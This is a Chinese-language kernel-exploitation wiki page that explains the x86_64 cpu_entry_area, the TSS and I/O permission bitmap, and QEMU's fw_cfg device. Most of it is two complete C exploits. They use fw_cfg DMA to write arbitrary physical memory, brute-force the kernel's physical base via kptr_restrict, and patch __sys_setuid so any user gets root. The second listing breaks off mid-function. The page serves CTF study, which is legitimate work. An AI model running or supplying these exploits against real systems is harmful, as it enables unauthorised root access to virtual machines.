> For the complete documentation index, see [llms.txt](https://lightc.gitbook.io/pwn-gitbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lightc.gitbook.io/pwn-gitbook/kpwn/kpwn-tricks/cea.md).

# CEA

[make cpu-entry-area great again – kqx](https://kqx.io/post/sp0/)

## cpu\_entry\_area

地址位于

```c
0xfffffe0000000000 - 0xfffffe7fffffffff (=39 bits) cpu_entry_area mapping
```

结构体如下

[cpu\_entry\_area.h - arch/x86/include/asm/cpu\_entry\_area.h - Linux source code v7.0.10 - Bootlin Elixir Cross Referencer](https://elixir.bootlin.com/linux/v7.0.10/source/arch/x86/include/asm/cpu_entry_area.h#L90)

```c
/*
 * Layout of one CPU's entry area, as quoted from the kernel header linked
 * above. Members inside CONFIG_X86_32 blocks are compiled out on x86_64
 * builds; estacks is present only when CONFIG_X86_64 is set.
 */
struct cpu_entry_area {
	char gdt[PAGE_SIZE];

	/*
	 * The GDT is just below entry_stack and thus serves (on x86_64) as
	 * a read-only guard page. On 32-bit the GDT must be writeable, so
	 * it needs an extra guard page.
	 */
#ifdef CONFIG_X86_32
	char guard_entry_stack[PAGE_SIZE];
#endif
	struct entry_stack_page entry_stack_page;

#ifdef CONFIG_X86_32
	char guard_doublefault_stack[PAGE_SIZE];
	struct doublefault_stack doublefault_stack;
#endif

	/*
	 * On x86_64, the TSS is mapped RO.  On x86_32, it's mapped RW because
	 * we need task switches to work, and task switches write to the TSS.
	 */
	struct tss_struct tss;

#ifdef CONFIG_X86_64
	/*
	 * Exception stacks used for IST entries with guard pages.
	 */
	struct cea_exception_stacks estacks;
#endif
	/*
	 * Per CPU debug store for Intel performance monitoring. Wastes a
	 * full page at the moment.
	 */
	struct debug_store cpu_debug_store;
	/*
	 * The actual PEBS/BTS buffers must be mapped to user space
	 * Reserve enough fixmap PTEs.
	 */
	struct debug_store_buffers cpu_debug_buffers;
};
```

在 64 位（x86\_64）内核中，条件编译展开后的结构体为

```c
/*
 * cpu_entry_area as it reads once the CONFIG_X86_32-only members are dropped
 * and the CONFIG_X86_64-only member is kept.
 */
struct cpu_entry_area {
	char gdt[PAGE_SIZE];				/* doubles as the read-only guard page below entry_stack */
	struct entry_stack_page entry_stack_page;
	struct tss_struct tss;				/* mapped read-only on x86_64 */
	struct cea_exception_stacks estacks;		/* exception stacks for IST entries, with guard pages */
    struct debug_store cpu_debug_store;			/* per-CPU debug store for Intel performance monitoring */
	struct debug_store_buffers cpu_debug_buffers;	/* PEBS/BTS buffers */
};
```

包括

```c
GDT
SP0
TSS
IST1~5
```

### **SP0/入口栈页**

从 `syscall` 进入后，将 `rsp` 切到 `entry_stack_page` ，完成 `cr3` 转换，然后从 `tss` 取出 `rsp0` ，存放着当前进程内核栈的栈顶地址，将 `rsp` 切换到 `rsp0` ，然后保存寄存器并进入`do_syscall_64`

在 `Linux 6.2` 前，`cpu_entry_area`并未随机化处理，而是映射到一个固定地址`0xfffffe0000001000`

> 地址 `0xfffffe0000000000` 包含 `IDT`

自 `Linux 6.2` 后，出于安全考虑，引入了 `cea_offset` 函数，当启用 `KASLR` 时，该函数会随机化 `cpu_entry_area` 相对于 `IDT`（仍位于固定地址 `0xfffffe0000000000` ）的偏移量

### **SGDT**

`x86` 指令，有时可在 `ring 3` 权限下使用，返回 `GDT` 的地址和大小

#### **UMIP 用户模式指令预防**

`CR4` 的第 `11` 位（ `UMIP` 位）可以为支持 `UMIP` 的 `CPU` 提供防护：该位被置位后，`ring 3` 程序尝试执行 `SGDT/SIDT/SLDT/SMSW/STR` 时会触发异常（通用保护故障 `GPF` ）

在现代 `Linux` 内核（ `5.4+` ）和较新的 `CPU` 上，`UMIP` 是默认开启的，然而，在 `Linux` 中 `ring 3` 执行不会触发异常，而是返回一些垃圾值

* `SGDT`此时返回 `0xfffffffffffe0000 << 16 | 0`
* `SIDT`： `0xffffffffffff0000 << 16 | 0`
* `SMSW`： `0x80050033`（Todo）
* `SLDT`： `0x50`（Todo）
* `STR`： `0x40`（Todo）

但是一般 `qemu` 不会开启 `UMIP` ，使用 `TCG` 时也没有实现补丁

### TSS

`TSS`的地址是可以预测的，可以重点关注一下这个结构体

```c
/*
 * Page-aligned TSS container: the hardware-defined part (x86_hw_tss)
 * followed by the I/O bitmap data (x86_io_bitmap).
 */
struct tss_struct {
	/*
	 * The fixed hardware portion.  This must not cross a page boundary
	 * at risk of violating the SDM's advice and potentially triggering
	 * errata.
	 */
	struct x86_hw_tss	x86_tss;

	struct x86_io_bitmap	io_bitmap;
} __aligned(PAGE_SIZE);

/*
 * Hardware-defined part of the TSS. The struct is packed, so the byte
 * offsets noted on each field follow directly from the field sizes;
 * the whole struct is 0x68 bytes.
 */
struct x86_hw_tss {
	u32			reserved1;	/* 0x00 */
	u64			sp0;		/* 0x04 */
	u64			sp1;		/* 0x0c */

	/*
	 * Since Linux does not use ring 2, the 'sp2' slot is unused by
	 * hardware.  entry_SYSCALL_64 uses it as scratch space to stash
	 * the user RSP value.
	 */
	u64			sp2;		/* 0x14 */

	u64			reserved2;	/* 0x1c */
	u64			ist[7];		/* 0x24 .. 0x5b */
	u32			reserved3;	/* 0x5c */
	u32			reserved4;	/* 0x60 */
	u16			reserved5;	/* 0x64 */
	u16			io_bitmap_base;	/* 0x66 */

} __attribute__((packed));

/*
 * All IO bitmap related data stored in the TSS. This is the type of the
 * io_bitmap member that follows x86_tss inside struct tss_struct.
 */
struct x86_io_bitmap {
	/* The sequence number of the last active bitmap. */
	u64			prev_sequence;

	/*
	 * Store the dirty size of the last io bitmap offender. The next
	 * one will have to do the cleanup as the switch out to a non io
	 * bitmap user will just set x86_tss.io_bitmap_base to a value
	 * outside of the TSS limit. So for sane tasks there is no need to
	 * actually touch the io_bitmap at all.
	 */
	unsigned int		prev_max;

	/*
	 * The extra 1 is there because the CPU will access an
	 * additional byte beyond the end of the IO permission
	 * bitmap. The extra byte must be all 1 bits, and must
	 * be within the limit.
	 */
	unsigned long		bitmap[IO_BITMAP_LONGS + 1];

	/*
	 * Special I/O bitmap to emulate IOPL(3). All bytes zero,
	 * except the additional byte at the end.
	 */
	unsigned long		mapall[IO_BITMAP_LONGS + 1];
};
```

也就是

```c
/*
 * tss_struct with x86_hw_tss and x86_io_bitmap written out inline.
 * Illustration only: in the real definition the x86_hw_tss part is packed,
 * which this flattened form does not express.
 */
struct tss_struct {
	/* --- fields of struct x86_hw_tss (hardware-defined) --- */
	u32			reserved1;
	u64			sp0;
	u64			sp1;
	u64			sp2;		/* unused by hardware; scratch slot for the user RSP in entry_SYSCALL_64 */
	u64			reserved2;
	u64			ist[7];
	u32			reserved3;
	u32			reserved4;
	u16			reserved5;
	u16			io_bitmap_base;
	/* --- fields of struct x86_io_bitmap --- */
    u64			prev_sequence;	/* sequence number of the last active bitmap */
	unsigned int		prev_max;	/* dirty size of the last io bitmap user */
	unsigned long		bitmap[IO_BITMAP_LONGS + 1];	/* +1: the CPU reads one byte past the bitmap */
	unsigned long		mapall[IO_BITMAP_LONGS + 1];	/* all-zero bitmap used to emulate IOPL(3) */
} __aligned(PAGE_SIZE);
```

#### I/O端口

[Kernel Blues, or Why x86 Is So Convoluted | Henry Wang | Personal Website](https://thekidofarcrania.gitlab.io/2020/07/19/kernel-blues/)

**许多 I/O 端口实际上并不会触发GP（通用保护）异常**，而是直接成功通过，不过并非所有端口都如此

* 端口号较大的情况仍会触发 `GP`
* 某些特定端口号（如 `0x20` ...）也会触发 `GP`

`CPU` 与 `IO` 通信主要有两种方式

* **Isolated/port I/O(PIO)**：所有 `I/O` 设备被映射到与主内存地址空间分离的地址空间（端口号）
* **Memory-Mapping I/O(MMIO)**：`I/O` 设备直接映射到与主内存相同的地址空间

在 `x86` 架构中，由于需要完全向后兼容整个芯片家族，因此常常继承了旧芯片的历史遗留特性。

具体而言，它使用16位数字标识端口号，并且可以通过in/out指令一次性传递8/16/32位数值，实际上大多数I/O设备只支持8位数据传输，为了传输16/24/32位大小的数据，需要采取更巧妙的方式

* 某些I/O设备使用多个端口，每个端口对应结果的特定字节
* 某些I/O设备只使用一个端口，通过状态翻转机制实现，首次写入字节时对应低位，第二次写入时对应高位字节
* 某些I/O设备有一个选择器端口，用于选择在“数据”端口中设置哪个属性
* 某些I/O设备综合运用上述多种方式

除了少数的标准端口号会在所有机器上保持一致，大多数端口号会因为接入的设备而异

显然，如果能直接用in/out指令编写与I/O外设交互的代码，那么任何用户都可以随意“破坏“几乎所有东西，因此在保护模式时x86处理器会进行一系列的检查来限制对I/O的访问

对应in指令（以及out指令），触发通用保护需要三个关键条件

* 保护模式
* 当前权限级别大于I/O权限级别，**CPL>IOPL**
* 当前 I/O 端口号不在“permission bit set”中（即 I/O 权限位图，每个端口占 1 bit，0 表示允许，1 表示禁止）

如果 TSS 中的 `io_bitmap_base` **大于或等于 TSS 的 Limit（界限）**，CPU 会认为**没有 I/O 位图**，从而**无条件拦截**所有 Ring 3 的 `in/out` 指令（触发 #GP），没触发则会通过`io_bitmap_base`（其值表示从 TSS 段起始位置的偏移量）找到位图，检查对应端口的bit位

还记得0x20端口会被禁用吗，这是因为这对应了tss->sp0字段，再加上tss的limit限制，我们大概只能访问0到0x340之间的端口

rflags 寄存器中有一个名为 IOPL 的两位（2 bit）字段

当前特权级不大于线程的IOPL时允许处理器与端口交互，当然也可以修改TSS中的IOPB中对应的位掩码

该漏洞只存在于 qemu 环境中，不依赖内核版本和编译配置，启用 KVM 时也同样有效

常规的qemu配置会打开一个设备，如下

```c
dev: fw_cfg_io, id ""
    dma_enabled = true
    x-file-slots = 32 (0x20)
    acpi-mr-restore = true
```

这个设备用于将文件等数据从宿主机传递给虚拟机（客户机），与设备交互的方法如下

```c
// I/O ports of the fw_cfg device
#define FW_CFG_PORT_SEL     0x510 // 16-bit port
#define FW_CFG_PORT_DATA    0x511 // 8-bit port
#define BIOS_CFG_DMA_ADDR_HIGH  0x514 // 32-bit port
#define BIOS_CFG_DMA_ADDR_LOW   0x518 // 32-bit port

// selector keys: written to FW_CFG_PORT_SEL to choose which item is read
#define FW_CFG_SIGNATURE	    0x00
#define FW_CFG_ID		        0x01
#define FW_CFG_UUID		        0x02
#define FW_CFG_RAM_SIZE		    0x03
#define FW_CFG_NOGRAPHIC	    0x04
#define FW_CFG_NB_CPUS		    0x05
#define FW_CFG_MACHINE_ID	    0x06
#define FW_CFG_KERNEL_ADDR	    0x07
#define FW_CFG_KERNEL_SIZE	    0x08
#define FW_CFG_KERNEL_CMDLINE	0x09
#define FW_CFG_INITRD_ADDR	    0x0a
#define FW_CFG_INITRD_SIZE	    0x0b
#define FW_CFG_BOOT_DEVICE	    0x0c
#define FW_CFG_NUMA		        0x0d
#define FW_CFG_BOOT_MENU	    0x0e
#define FW_CFG_MAX_CPUS		    0x0f
#define FW_CFG_KERNEL_ENTRY	    0x10
#define FW_CFG_KERNEL_DATA	    0x11
#define FW_CFG_INITRD_DATA	    0x12
#define FW_CFG_CMDLINE_ADDR	    0x13
#define FW_CFG_CMDLINE_SIZE	    0x14
#define FW_CFG_CMDLINE_DATA	    0x15
#define FW_CFG_SETUP_ADDR	    0x16
#define FW_CFG_SETUP_SIZE	    0x17
#define FW_CFG_SETUP_DATA	    0x18
#define FW_CFG_FILE_DIR		    0x19

// FW_CFG_FILE_DIR 的数据格式：
// 先是一个 32 位大端序的条目数量，随后是若干个 FWCfgFile 条目
/* One directory entry. Multi-byte fields are stored big-endian. */
struct FWCfgFile {		/* an individual file entry, 64 bytes total */
   uint32_t size;		/* size of referenced fw_cfg item, big-endian */
   uint16_t select;		/* selector key of fw_cfg item, big-endian */
   uint16_t reserved;
   char name[56];		/* fw_cfg item name, NUL-terminated ascii */
};
```

很多内核pwn题会将flag存储在initramfs.cpio.gz或rootfs.cpio.gz，利用FW\_CFG\_INITRD\_DATA可以轻松转储这些文件内容

FW\_CFG\_PORT\_DMA（即上面的 BIOS\_CFG\_DMA\_ADDR\_HIGH / BIOS\_CFG\_DMA\_ADDR\_LOW 两个 32 位端口）用于通过一次 DMA 传输快速取得所需的全部数据

```c
// fw_cfg DMA commands
// Bit flags for FWCfgDmaAccess.control. The exploit code further down ORs
// them together and puts a selector key in the upper 16 bits (selector << 16).
typedef enum fw_cfg_ctl_t {
    fw_ctl_error = 1,
    fw_ctl_read = 2,
    fw_ctl_skip = 4,
    fw_ctl_select = 8,
    fw_ctl_write = 16 // this only works on QEMU version < 2.4
} fw_cfg_ctl_t;

// Command descriptor handed to the device by physical address.
// The exploit code further down stores all three fields big-endian.
typedef struct FWCfgDmaAccess {
    uint32_t control;   // command flags, optionally with a selector key
    uint32_t length;    // byte count for fw_ctl_read / fw_ctl_skip
    uint64_t address;   // physical address of the transfer target (fw_ctl_read)
} FWCfgDmaAccess;
```

要检查DMA传输是否启用，需从选择器FW\_CFG\_ID中读取数据，并验证其第二位（bit 1）是否被置位

为了设置DMA传输，我们需要将FWCfgDmaAccess结构体存储在一个已知的物理内存地址上

control字段指定了要执行的命令，在某些情况下还指定了要使用的选择器

length 对 fw\_ctl\_read 表示要读取的字节数；对 fw\_ctl\_skip 则表示要在当前条目中向前跳过的字节数

address仅用于fw\_ctl\_read，并包含目标物理地址

设置好结构体后，我们只需将其物理地址写入FW\_CFG\_PORT\_DMA\_{LOW,HIGH}（即前文的 BIOS\_CFG\_DMA\_ADDR\_{LOW,HIGH}）即可！通过改变数据块（例如initrd，因为它足够大，能包含从0到255的所有字节）的寻址位置，我们可以向任意物理地址写入任意字节

通过使用 ptregs 和 SP0 来找到一个包含用户可控数据的固定物理地址是轻而易举的

借助任意物理写入能力，我们可以使用与解决/dev/mem挑战（利用 kptr\_restrict）相同的判定方法，来找到内核的物理地址。此时，我们可以修补\_\_sys\_setuid函数，以授予任意用户root权限

事实上，我们还可以把字符串"QEMU"（或其任意子串）写入任意物理地址：只需使用签名选择器（FW\_CFG\_SIGNATURE）作为数据来源。此时通过修补\_\_sys\_setuid+61即可实现提权

下面是两种实现方法

```c
#include "helpers.h"
#include <sys/io.h>
#include <endian.h>
#include <arpa/inet.h>
#include <string.h>

// PWN CONSTANTS
// Lowest candidate physical kernel base and the step between candidates
// walked by the brute-force loop in main().
#define CONFIG_PHYSICAL_START   0x1000000ul
#define CONFIG_PHYSICAL_ALIGN   0x0200000ul

// procfs file parsed by check_kptr_restrict(), and the offset main() adds to a
// candidate base when writing to it (presumably specific to the target kernel
// build -- confirm before reuse).
#define KPTR_RESTRICT           "/proc/sys/kernel/kptr_restrict"
#define KPTR_RESTRICT_OFFSET    0x1eb93a0ul

// Offset from the physical kernel base of the byte main() overwrites, and the
// byte written there.
#define SETUID_CHECK            0x02b960dul
#define SETUID_PATCH            0x75        // je -> jne

// CFG PORTS
#define FW_CFG_PORT_SEL         0x510
#define FW_CFG_PORT_DATA        0x511
#define BIOS_CFG_DMA_ADDR_HIGH  0x514
#define BIOS_CFG_DMA_ADDR_LOW   0x518

// Selector keys; only FW_CFG_INITRD_SIZE and FW_CFG_INITRD_DATA are used by
// the functions in this listing.
#define FW_CFG_SIGNATURE	    0x00
#define FW_CFG_ID		        0x01
#define FW_CFG_UUID		        0x02
#define FW_CFG_RAM_SIZE		    0x03
#define FW_CFG_NOGRAPHIC	    0x04
#define FW_CFG_NB_CPUS		    0x05
#define FW_CFG_MACHINE_ID	    0x06
#define FW_CFG_KERNEL_ADDR	    0x07
#define FW_CFG_KERNEL_SIZE	    0x08
#define FW_CFG_KERNEL_CMDLINE	0x09
#define FW_CFG_INITRD_ADDR	    0x0a
#define FW_CFG_INITRD_SIZE	    0x0b
#define FW_CFG_BOOT_DEVICE	    0x0c
#define FW_CFG_NUMA		        0x0d
#define FW_CFG_BOOT_MENU	    0x0e
#define FW_CFG_MAX_CPUS		    0x0f
#define FW_CFG_KERNEL_ENTRY	    0x10
#define FW_CFG_KERNEL_DATA	    0x11
#define FW_CFG_INITRD_DATA	    0x12
#define FW_CFG_CMDLINE_ADDR	    0x13
#define FW_CFG_CMDLINE_SIZE	    0x14
#define FW_CFG_CMDLINE_DATA	    0x15
#define FW_CFG_SETUP_ADDR	    0x16
#define FW_CFG_SETUP_SIZE	    0x17
#define FW_CFG_SETUP_DATA	    0x18
#define FW_CFG_FILE_DIR		    0x19


// https://wiki.osdev.org/QEMU_fw_cfg
// Directory entry layout; kept for reference, no function in this listing uses it.
struct FWCfgFile {
    uint32_t size;		/* size of referenced fw_cfg item, big-endian */
    uint16_t select;	/* selector key of fw_cfg item, big-endian */
    uint16_t reserved;
    char name[56];		/* fw_cfg item name, NUL-terminated ascii */   
};

// fw_cfg DMA commands
// Bit flags for the control word; arbw() ORs them together and places the
// selector key in the upper 16 bits (selector << 16).
typedef enum fw_cfg_ctl_t {
    fw_ctl_error = 1,
    fw_ctl_read = 2,
    fw_ctl_skip = 4,
    fw_ctl_select = 8,
    fw_ctl_write = 16
} fw_cfg_ctl_t;

// DMA command descriptor. default_get_cmd() fills every field in big-endian
// byte order and returns the descriptor's physical address.
typedef struct FWC_fg_dma_access {
    uint32_t control;   // fw_cfg_ctl_t flags | (selector << 16)
    uint32_t length;    // number of bytes to read or skip
    uint64_t address;   // physical address the device transfers to
} FWC_fg_dma_access;

// Buffer filled by the first successful read_initrd(); later calls return it
// instead of reading the initrd through the data port again.
uint8_t* initrd_cache = NULL;

//
// Translates a virtual address of the calling process into a physical
// address by looking up its entry in /proc/self/pagemap.
//
// virt_addr: virtual address to translate.
// Returns the physical address, or (uint64_t)-1 when the page size cannot be
// queried, pagemap cannot be opened/read, the page is not present, or the
// kernel reported a zero PFN.
//
uint64_t get_physical_addr(uint64_t virt_addr) {
    long page_size = sysconf(_SC_PAGESIZE);
    if (page_size <= 0) {
        perror("sysconf");
        return (uint64_t)-1;
    }

    uint64_t page_bytes = (uint64_t)page_size;
    uint64_t page_offset = virt_addr % page_bytes;
    uint64_t virt_page_index = virt_addr / page_bytes;

    // Open pagemap
    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd == -1) {
        perror("open pagemap");
        return (uint64_t)-1;
    }

    // pagemap holds one 64-bit entry per virtual page; seek to ours
    uint64_t entry;
    if (lseek(fd, virt_page_index * sizeof(entry), SEEK_SET) == -1) {
        perror("lseek pagemap");
        close(fd);
        return (uint64_t)-1;
    }

    if (read(fd, &entry, sizeof(entry)) != sizeof(entry)) {
        perror("read pagemap");
        close(fd);
        return (uint64_t)-1;
    }

    close(fd);

    // Check if page is present
    if (!(entry & (1ULL << 63))) {
        fprintf(stderr, "Page not present\n");
        return (uint64_t)-1;
    }

    // PFN is bits 0-54 (if present)
    uint64_t pfn = entry & ((1ULL << 55) - 1);

    // The kernel zeroes the PFN field for callers without CAP_SYS_ADMIN.
    // Treat that as a failure instead of returning the bare page offset.
    if (pfn == 0) {
        fprintf(stderr, "PFN hidden (pagemap needs CAP_SYS_ADMIN)\n");
        return (uint64_t)-1;
    }

    return (pfn * page_bytes) + page_offset;
}

//
// Allocates a DMA command descriptor, fills it in big-endian byte order and
// returns its physical address.
//
// control: fw_cfg_ctl_t flags, optionally with a selector in the upper 16 bits
// address: physical address the transfer targets
// length:  number of bytes to read or skip
//
// Returns the physical address of the descriptor, or (uint64_t)-1 when the
// allocation or the address translation fails. The descriptor is not freed
// here: the caller passes the returned address to the device afterwards.
//
uint64_t default_get_cmd(uint32_t control, uint64_t address, uint32_t length){
    FWC_fg_dma_access* cmd = calloc(1, sizeof(*cmd));
    if (cmd == NULL)
        return (uint64_t)-1;

    // Writing the fields also touches the page, so it has a pagemap entry
    // by the time it is translated.
    cmd->control = htonl(control);
    cmd->address = htobe64(address);
    cmd->length = htonl(length);

    uint64_t phys = get_physical_addr((uint64_t)cmd);
    if (phys == (uint64_t)-1)
        free(cmd);  // never handed to the device, so safe to release
    return phys;
}

// Selects the FW_CFG_INITRD_SIZE item and reads its four bytes from the data
// port into a uint32_t, lowest-addressed byte first.
uint32_t get_initrd_size(){
    uint32_t size_raw = 0;
    int8_t *dst = (int8_t *)&size_raw;

    outw(FW_CFG_INITRD_SIZE, FW_CFG_PORT_SEL);

    for (unsigned n = 0; n < sizeof(size_raw); n++)
        dst[n] = inb(FW_CFG_PORT_DATA);

    return size_raw;
}
uint8_t* read_initrd(){
    uint32_t initrd_size;
    uint8_t* initrd_data;

    if(initrd_cache != NULL)
        return initrd_cache;

    initrd_size = get_initrd_size();
    initrd_data = calloc(1, initrd_size);

    if(initrd_data == NULL)
        return NULL;
    
    outw(FW_CFG_INITRD_DATA, FW_CFG_PORT_SEL);
    for(int i = 0; i < initrd_size; ++i)
        initrd_data[i] = inb(FW_CFG_PORT_DATA);
    
    initrd_cache = initrd_data;
    return initrd_data;
}

int arbw(uint64_t phys_addr, uint8_t value, uint64_t (* get_cmd)(uint32_t, uint64_t, uint32_t)){
    uint64_t cmd_physaddr;
    uint32_t cmd_physaddr_lo;
    uint32_t cmd_physaddr_hi;

    uint64_t byte_addr;
    uint32_t byte_off;
    
    uint32_t initrd_size;
    uint8_t* initrd_data;
    
    //
    // Find the target byte in initrd
    //
    initrd_size = get_initrd_size();
    initrd_data = read_initrd();    

    byte_addr = (uint64_t)memmem(initrd_data, initrd_size, &value, sizeof(uint8_t));
    
    if(byte_addr == 0)
        return 0;
    
    byte_off = byte_addr - (uint64_t)initrd_data;

    //
    // Skip
    //
    if(get_cmd == NULL)
        cmd_physaddr = default_get_cmd(fw_ctl_skip | fw_ctl_select | (FW_CFG_INITRD_DATA << 16), 0, byte_off);
    else
        cmd_physaddr = get_cmd(fw_ctl_skip | fw_ctl_select | (FW_CFG_INITRD_DATA << 16), 0, byte_off);
    
    cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
    cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);

    outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
    outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);
    

    //
    // 1 byte DMA transfer
    //
    if(get_cmd == NULL)
        cmd_physaddr = default_get_cmd(fw_ctl_read | (FW_CFG_INITRD_DATA << 16), phys_addr, 1);
    else
        cmd_physaddr = get_cmd(fw_ctl_read | (FW_CFG_INITRD_DATA << 16), phys_addr, 1);
    
    cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
    cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);

    outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
    outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);

    return 1;
}

// Reads the integer currently exposed by the KPTR_RESTRICT procfs file.
// Returns that value, or 0 when the file cannot be opened or parsed.
uint32_t check_kptr_restrict(){
    unsigned int level = 0;
    FILE* f = fopen(KPTR_RESTRICT, "rb");

    if (f == NULL)
        return 0;

    // %u matches the unsigned destination; it also accepts a leading '-',
    // so a value the kernel prints as negative still reads back as non-zero.
    if (fscanf(f, "%u", &level) != 1)
        level = 0;

    fclose(f);
    return level;
}

// Entry point of the initrd-based variant.
//
// 1. Walks candidate physical kernel bases downwards in CONFIG_PHYSICAL_ALIGN
//    steps, writing 0xaa to (base + KPTR_RESTRICT_OFFSET) each time, and stops
//    as soon as check_kptr_restrict() reads back a non-zero value. This
//    assumes kptr_restrict is 0 beforehand.
// 2. Overwrites the byte at (base + SETUID_CHECK) with SETUID_PATCH.
//
// Returns 0 on success, 1 when a write fails or no candidate base matched.
int main(int argc, char** argv)
{
    uint64_t phys_kbase;
    int located = 0;

    (void)argc;
    (void)argv;

    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    // to gain this you need an actual vuln
    if (ioperm(0, 0xffff, 1) != 0)
        perror("ioperm");   // report only; port access may have been obtained another way

    // phys kaslr bruteforce (using kptr_restrict as oracle)
    puts("start of bruteforce");
    for(phys_kbase = CONFIG_PHYSICAL_START + CONFIG_PHYSICAL_ALIGN * 0x10000; phys_kbase >= CONFIG_PHYSICAL_START; phys_kbase -= CONFIG_PHYSICAL_ALIGN){
        if(!arbw(phys_kbase + KPTR_RESTRICT_OFFSET, 0xaa, NULL))
            goto err;

        // The write landed on kptr_restrict iff the procfs value changed.
        if(check_kptr_restrict() != 0){
            located = 1;
            break;
        }
    }

    // Without a hit phys_kbase has run past the lowest candidate.
    if(!located)
        goto err;

    printf("phys kbase @ %p\n", (void *)(uintptr_t)phys_kbase);

    if(!arbw(phys_kbase + SETUID_CHECK, SETUID_PATCH, NULL))
        goto err;

    puts("pwned");
    return 0;

    err:
    puts("exploit failed");
    return 1;
}
```

```c
#include "helpers.h"
#include <sys/io.h>
#include <endian.h>
#include <sys/syscall.h>
#include <signal.h>

#include <asm/ldt.h>

// Not referenced by any function in this listing.
#define WRITE_LDT 1

// Lowest candidate physical kernel base and the step between candidates
// walked by the loop in fw_cfg().
#define CONFIG_PHYSICAL_START   0x1000000ul
#define CONFIG_PHYSICAL_ALIGN   0x0200000ul

// procfs file parsed by check_kptr_restrict(), and the offset fw_cfg() adds to
// a candidate base when writing to it (presumably specific to the target
// kernel build -- confirm before reuse).
#define KPTR_RESTRICT           "/proc/sys/kernel/kptr_restrict"
#define KPTR_RESTRICT_OFFSET    0x1eb93a0ul

// Offset from the physical kernel base of the first byte fw_cfg() patches.
#define SETUID_CHECK            0x02b960dul

// CFG PORTS
#define FW_CFG_PORT_SEL         0x510
#define FW_CFG_PORT_DATA        0x511

#define BIOS_CFG_DMA_ADDR_HIGH  0x514
#define BIOS_CFG_DMA_ADDR_LOW   0x518

// Selector of the signature item and the bytes arbw() searches for its payload.
#define FW_CFG_SIGNATURE	    0x00
#define SIGNATURE               "QEMU"

// Physical address sp0_get_cmd() returns as the location of its command
// descriptor. No trailing ';' so the macro can be used inside expressions.
#define SP0_PTREGS_PHYS_ADDR    0xf60cf58ul				// depends on memory size, im running with 256M


// https://wiki.osdev.org/QEMU_fw_cfg


// fw_cfg DMA commands
// Bit flags for the control word; arbw() ORs them together and places the
// selector key in the upper 16 bits (selector << 16).
typedef enum fw_cfg_ctl_t {
    fw_ctl_error = 1,
    fw_ctl_read = 2,
    fw_ctl_skip = 4,
    fw_ctl_select = 8,
    fw_ctl_write = 16
} fw_cfg_ctl_t;

// DMA command descriptor layout. Never instantiated in this listing:
// sp0_get_cmd() packs the same three values into r15 (control in the low
// half, length in the high half) and r14 (address) instead.
typedef struct FWCfgDmaAccess {
    uint32_t control;
    uint32_t length;
    uint64_t address;
} FWCfgDmaAccess;

// SIGFPE handler installed by main(). It resumes execution after the faulting
// instruction instead of re-running it.
//
// sig, si: unused.
// context: ucontext_t of the interrupted code; its saved RIP is modified.
void sigfpe_handler(int sig, siginfo_t *si, void *context) {
    ucontext_t *uc = (ucontext_t *)context;

    // 3 is the encoded length of `div rax` (48 F7 F0), the instruction
    // sp0_get_cmd() uses to raise the fault.
    uc->uc_mcontext.gregs[REG_RIP] += 3;
}

// Builds a DMA command descriptor without allocating memory: the three
// fields are converted to big-endian, loaded into r15/r14, and a
// divide-by-zero fault is raised while those registers hold them.
//
// NOTE(review): this presumably relies on the kernel saving the user
// registers on fault entry so that r15 and r14 end up adjacent in memory at
// SP0_PTREGS_PHYS_ADDR, mirroring FWCfgDmaAccess -- confirm against
// struct pt_regs and the target's memory layout.
//
// control/address/length: same meaning as the FWCfgDmaAccess fields.
// Returns SP0_PTREGS_PHYS_ADDR, a fixed, setup-specific physical address.
uint64_t sp0_get_cmd(uint32_t control, uint64_t address, uint32_t length) {
    control = htonl(control);
    address = htobe64(address);
    length = htonl(length);

    asm volatile(
        ".intel_syntax noprefix\n"
        // r15 = (length << 32) | control
        "mov r15d, %1\n"
        "shl r15, 32\n"
        "mov r14d, %0\n"
        "or r15, r14\n"
        // r14 = address
        "mov r14, %2\n"
        // rax / 0 raises SIGFPE; sigfpe_handler() skips the div on return
        "mov rax, 0\n"
        "div rax\n"
        ".att_syntax prefix\n"
        :
        : "r" (control), "r" (length), "r" (address)
        : "rax", "r14", "r15"
    );

    return SP0_PTREGS_PHYS_ADDR;
}

//
// Writes `size` bytes to an arbitrary physical address using fw_cfg DMA, with
// the FW_CFG_SIGNATURE item as the data source.
//
// `value` must occur inside SIGNATURE (terminating NUL included). The function
// issues a select+skip command that moves the device's read position to that
// occurrence, then a read command that transfers `size` bytes to `phys_addr`.
// Both descriptors come from sp0_get_cmd().
//
// phys_addr: physical address to overwrite
// value:     bytes to write; only their position inside SIGNATURE is used
// size:      number of bytes
//
// Returns 1 once both commands were submitted, 0 when `value` is NULL, `size`
// is not positive, or `value` does not occur in SIGNATURE.
//
int arbw(uint64_t phys_addr, char* value, int size){
    // Search one single copy of the signature: taking the difference of
    // pointers into two separate "QEMU" literals would depend on the
    // compiler merging them.
    static const char signature[] = SIGNATURE;

    uint64_t cmd_physaddr;
    uint32_t cmd_physaddr_lo;
    uint32_t cmd_physaddr_hi;

    uint32_t byte_off = 0;
    int found = 0;

    if(value == NULL || size <= 0 || (size_t)size > sizeof(signature))
        return 0;

    for(size_t off = 0; off + (size_t)size <= sizeof(signature); ++off){
        if(memcmp(signature + off, value, (size_t)size) == 0){
            byte_off = (uint32_t)off;
            found = 1;
            break;
        }
    }

    if(!found)
        return 0;

    //
    // Skip
    //
    cmd_physaddr = sp0_get_cmd(fw_ctl_skip | fw_ctl_select | (FW_CFG_SIGNATURE << 16), 0, byte_off);

    cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
    cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);

    // The upper half is written only when it is non-zero.
    if (cmd_physaddr_hi)
        outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
